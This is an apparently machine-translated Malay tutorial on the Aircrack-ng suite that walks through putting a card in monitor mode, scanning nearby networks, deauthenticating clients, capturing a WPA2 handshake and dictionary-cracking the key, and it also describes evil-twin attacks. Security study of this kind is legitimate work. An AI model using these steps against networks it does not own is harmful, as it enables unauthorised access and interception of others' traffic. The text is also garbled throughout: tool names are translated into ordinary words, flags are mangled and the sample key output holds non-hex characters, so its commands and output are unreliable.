Cara Menggunakan Aircrack-ng

How Use Aircrack Ng



Selalunya, orang tidak pernah memikirkan rangkaian yang dihubungkan. Mereka tidak pernah memikirkan seberapa selamat rangkaian itu dan berapa banyak mereka mempertaruhkan data sulit mereka setiap hari. Anda boleh menjalankan pemeriksaan kerentanan pada rangkaian wifi anda dengan menggunakan alat yang sangat kuat yang disebut Aircrack-ng dan Wireshark. Wireshark digunakan untuk memantau aktiviti rangkaian. Aircrack-ng lebih mirip alat agresif yang membolehkan anda menggodam dan memberi akses ke sambungan Tanpa Wayar. Berfikir sebagai penyusup selalu menjadi kaedah paling selamat untuk melindungi diri anda daripada serangan. Anda mungkin dapat memahami tindakan tepat yang akan dilakukan oleh penyusup untuk mendapatkan akses ke sistem anda dengan belajar mengenai kapal terbang. Anda kemudian boleh melakukan pemeriksaan pematuhan pada sistem anda sendiri untuk memastikan sistem ini tidak selamat.

Aircrack-ng adalah satu set perisian yang direka untuk menguji keselamatan rangkaian WiFi. Ia bukan hanya satu alat tetapi kumpulan alat, yang masing-masing melaksanakan tujuan tertentu. Kawasan keselamatan wifi yang berbeza dapat diusahakan, seperti memantau Titik Akses, menguji, menyerang jaringan, memecahkan jaringan wifi, dan mengujinya. Objektif utama Aircrack adalah memintas paket dan menguraikan hash untuk memecahkan kata laluan. Ia menyokong hampir semua antara muka tanpa wayar baru. Aircrack-ng adalah versi yang lebih baik dari suite alat Aircrack yang ketinggalan zaman, ng merujuk kepada Generasi Baru . Beberapa alat hebat yang berfungsi bersama dalam melaksanakan tugas yang lebih besar.







Airmon:

Airmon-ng termasuk dalam kit aircrack-ng yang meletakkan kad antara muka rangkaian dalam mod monitor. Kad rangkaian biasanya hanya akan menerima paket yang disasarkan untuknya seperti yang ditentukan oleh alamat MAC NIC, tetapi dengan airmon-ng, semua paket tanpa wayar, sama ada mereka disasarkan untuk mereka atau tidak, akan diterima juga. Anda seharusnya dapat menangkap paket ini tanpa memautkan atau mengesahkan dengan titik akses. Ini digunakan untuk memeriksa status Titik Akses dengan meletakkan antara muka jaringan dalam mod monitor. Mula-mula seseorang harus mengkonfigurasi kad wayarles untuk menghidupkan mod monitor, kemudian matikan semua proses latar belakang jika anda berfikir bahawa sebarang proses mengganggu dengannya. Setelah menamatkan proses, mod monitor dapat diaktifkan pada antara muka tanpa wayar dengan menjalankan perintah di bawah:



[dilindungi e-mel]: ~ $sudoairmon-ng mula wlan0#

Anda juga dapat mematikan mod monitor dengan menghentikan airmon-ng kapan saja dengan menggunakan perintah di bawah:

[dilindungi e-mel]: ~ $sudohentian airmon-ng wlan0#

Airodump:

Airodump-ng digunakan untuk menyenaraikan semua rangkaian di sekitar kita dan untuk melihat maklumat berharga mengenai mereka. Fungsi asas airodump-ng adalah mengendus paket, jadi pada dasarnya diprogramkan untuk merebut semua paket di sekitar kita sambil dimasukkan ke dalam mod monitor. Kami akan menjalankannya terhadap semua sambungan di sekitar kami dan mengumpulkan data seperti jumlah pelanggan yang terhubung ke rangkaian, alamat mac yang sesuai, gaya penyulitan, dan nama saluran dan kemudian mula menyasarkan rangkaian sasaran kami.

Dengan mengetik perintah airodump-ng dan memberikannya nama antara muka rangkaian sebagai parameter, kita dapat mengaktifkan alat ini. Ia akan menyenaraikan semua titik akses, jumlah paket data, kaedah penyulitan dan pengesahan yang digunakan, dan nama rangkaian (ESSID). Dari sudut peretasan, alamat mac adalah bidang yang paling penting.

[dilindungi e-mel]: ~ $sudoairodump-ng wlx0mon

Pesawat udara:

Aircrack digunakan untuk memecahkan kata laluan. Setelah menangkap semua paket menggunakan airodump, kita dapat memecahkan kunci dengan menggunakan pesawat udara. Ia memecahkan kunci ini menggunakan dua kaedah PTW dan FMS. Pendekatan PTW dilakukan dalam dua fasa. Pada mulanya, hanya paket ARP yang digunakan, dan hanya selepas itu, jika kunci tidak retak setelah pencarian, ia menggunakan semua paket lain yang ditangkap. Titik tambah dari pendekatan PTW adalah bahawa tidak semua paket digunakan untuk retak. Dalam pendekatan kedua, iaitu FMS, kami menggunakan kedua-dua model statistik dan algos brute force untuk memecahkan kunci. Kaedah kamus juga boleh digunakan.

Permainan Aire:

Airplay-ng memperkenalkan paket ke rangkaian tanpa wayar untuk membuat atau mempercepat lalu lintas. Paket dari dua sumber yang berbeza dapat ditangkap oleh aireplay-ng. Yang pertama adalah rangkaian langsung, dan yang kedua adalah paket dari fail pcap yang sudah ada. Airplay-ng berguna semasa serangan deautentikasi yang menyasarkan titik akses tanpa wayar dan pengguna. Lebih-lebih lagi, anda boleh melakukan beberapa serangan seperti serangan coffee latte dengan airplay-ng, alat yang membolehkan anda mendapatkan kunci dari sistem klien. Anda boleh mencapainya dengan menangkap paket ARP dan kemudian memanipulasinya dan menghantarnya kembali ke sistem. Pelanggan kemudian akan membuat paket yang dapat ditangkap oleh airodump dan aircrack memecahkan kunci dari paket yang diubahsuai itu. Beberapa pilihan serangan lain dari airplay-ng termasuk chopchop, fragmen arepreplay, dll.

Pangkalan Udara:

Airbase-ng digunakan untuk mengubah komputer penyusup menjadi titik sambungan yang dikompromikan untuk dihubungkan oleh orang lain. Dengan menggunakan Airbase-ng, anda boleh mengaku sebagai jalan masuk yang sah dan melakukan serangan man-in-the-middle pada komputer yang terpasang ke rangkaian anda. Serangan seperti ini disebut Evil Twin Attacks. Mustahil bagi pengguna asas untuk membezakan antara titik akses sah dan titik akses palsu. Jadi, ancaman kembar jahat adalah antara ancaman wayarles yang paling mengancam yang kita hadapi sekarang.

Airolib-ng:

Airolib mempercepat proses penggodaman dengan menyimpan dan menguruskan senarai kata laluan dan pusat akses. Sistem pengurusan pangkalan data yang digunakan oleh program ini adalah SQLite3, yang kebanyakannya tersedia di semua platform. Keretakan kata laluan merangkumi pengiraan kunci induk berpasangan di mana kunci sementara (PTK) diekstrak. Dengan menggunakan PTK, anda dapat menentukan kod pengenalan mesej bingkai (MIC) untuk paket tertentu dan secara teorinya mendapati MIC serupa dengan paket, jadi jika PTK betul, PMK juga betul.

Untuk melihat senarai kata laluan dan mengakses rangkaian yang disimpan dalam pangkalan data, ketik perintah berikut:

[dilindungi e-mel]: ~ $sudodata-statase pangkalan data –stats

Di sini testdatabase adalah db yang ingin anda akses atau buat, dan –stats adalah operasi yang anda ingin lakukan di atasnya. Anda boleh melakukan banyak operasi pada bidang pangkalan data, seperti memberi keutamaan maksimum kepada beberapa SSID atau sesuatu. Untuk menggunakan airolib-ng dengan aircrack-ng, masukkan perintah berikut:

[dilindungi e-mel]: ~ $sudokapal terbang-ng-rtestdatabase wpa2.eapol.cap

Di sini kita menggunakan PMK yang sudah dikira yang disimpan di pangkalan data ujian untuk mempercepat proses pemecahan kata laluan.

Cracking WPA / WPA2 menggunakan Aircrack-ng:

Mari kita lihat contoh kecil apa yang dapat dilakukan oleh aircrack-ng dengan bantuan beberapa alat hebatnya. Kami akan memecahkan kunci pra-kongsi rangkaian WPA / WPA2 menggunakan kaedah kamus.

Perkara pertama yang perlu kita lakukan ialah menyenaraikan antara muka rangkaian yang menyokong mod monitor. Ini boleh dilakukan dengan menggunakan arahan berikut:

[dilindungi e-mel]: ~ $sudoairmon-ng

Chipset Pemacu Antaramuka PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Kita dapat melihat antara muka; sekarang, kita harus meletakkan antara muka rangkaian yang kita temukan (wlx0) dalam mod monitor menggunakan perintah berikut:

[dilindungi e-mel]: ~ $sudoairmon-ng bermula wlx0

Ia telah membolehkan mod monitor pada antara muka yang dipanggil wlx0mon .

Sekarang kita harus mula mendengar siaran oleh penghala berdekatan melalui antara muka rangkaian yang telah kita masukkan dalam mod monitor.

[dilindungi e-mel]: ~ $sudoairodump-ng wlx0mon

CH5 ][Berlalu:30s][ 2020-12-02 00:17



Suara BSSID PWR#Data, # / s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Empat lima 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10: MENJADI-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: MEMBERI:88: FA:38: 02-68 28 2 0 sebelas54e WPA2 CCMP PSK TP-Link_3802



Probe BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C: 3A:Empat lima: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31SM:91: B5: F8: 7E: D5 -390e-1 1002 13

Rangkaian sasaran kami adalah Crackit dalam kes ini, yang sedang berjalan di saluran 1.

Di sini untuk memecahkan kata laluan rangkaian sasaran, kita perlu menangkap jabat tangan 4 arah, yang berlaku ketika peranti cuba menyambung ke rangkaian. Kami dapat menangkapnya dengan menggunakan perintah berikut:

[dilindungi e-mel]: ~ $sudoairodump-ng-c 1--ssid E4: 6F:13: 04: CE:31 -dalam /rumah wlx0

-c : Saluran

–Bss : Bssid rangkaian sasaran

-dalam : Nama direktori di mana fail pcap akan ditempatkan

Sekarang kita harus menunggu peranti menyambung ke rangkaian, tetapi ada cara yang lebih baik untuk menangkap jabat tangan. Kami boleh menyahaktifkan peranti ke AP menggunakan serangan deautentikasi menggunakan arahan berikut:

[dilindungi e-mel]: ~ $sudoaireplay-ng-0 -untukE4: 6F:13: 04: CE:31

ke : Bssid rangkaian sasaran

-0 : serangan deauthentikasi

Kami telah memutuskan semua peranti, dan sekarang kami harus menunggu peranti menyambung ke rangkaian.

CH1 ][Berlalu:30s][ 2020-12-02 00:02][Jabat tangan WPA: E4: 6F:13: 04: CE:31



Beacon BSSID PWR RXQ#Data, # / s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 1CCMP WPA2 ke-54 PSK P



Probe BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31SM:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Empat lima: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Kami mendapat hit, dan dengan melihat sudut kanan atas tepat di sebelah waktu, kami dapat melihat jabat tangan telah ditangkap. Sekarang lihat di folder yang ditentukan ( / rumah dalam kes kami) untuk a .pcap fail.

Untuk memecahkan kunci WPA, kita dapat menggunakan perintah berikut:

[dilindungi e-mel]: ~ $sudokapal terbang-ng-a2 -dalamrockyou.txt-bE4: 6F:13: 04: CE:31jabat tangan.cap

b: Bssid rangkaian sasaran

-a2: Mod WPA2

Rockyou.txt: Kamusfailterpakai

Handshake.cap: Thefail yang manamengandungi jabat tangan yang ditangkap

Aircrack-ng1.2beta3

[00:01:49] 10566kunci diuji(1017.96ke/s)

DIKENAKAN UTAMA! [anda mendapat saya]

Kunci Induk: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Flima puluhC


Kekunci Sementara: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6Flima puluhC025 62E9 5D71

Kunci rangkaian sasaran kami berjaya ditembusi.

Kesimpulan:

Rangkaian tanpa wayar ada di mana-mana, digunakan oleh setiap syarikat, dari pekerja yang menggunakan telefon pintar hingga peranti kawalan industri. Menurut penyelidikan, hampir 50 peratus lalu lintas internet akan melalui WiFi pada tahun 2021. Rangkaian tanpa wayar mempunyai banyak kelebihan, komunikasi di luar pintu, akses internet yang cepat di tempat-tempat di mana hampir mustahil meletakkan kabel, dapat mengembangkan rangkaian tanpa memasang kabel untuk pengguna lain, dan boleh menghubungkan peranti mudah alih anda ke pejabat rumah anda dengan mudah semasa anda tidak berada di sana.

Walaupun terdapat kelebihan ini, terdapat tanda tanya besar mengenai privasi dan keselamatan anda. Sebagai rangkaian ini; dalam jangkauan transmisi router terbuka untuk semua orang, mereka dapat diserang dengan mudah, dan data anda dapat dikompromikan dengan mudah. Contohnya, jika anda tersambung ke wifi awam, sesiapa sahaja yang tersambung ke rangkaian itu dapat memeriksa lalu lintas rangkaian anda dengan mudah menggunakan beberapa kepintaran dan dengan bantuan alat hebat yang ada dan bahkan membuangnya.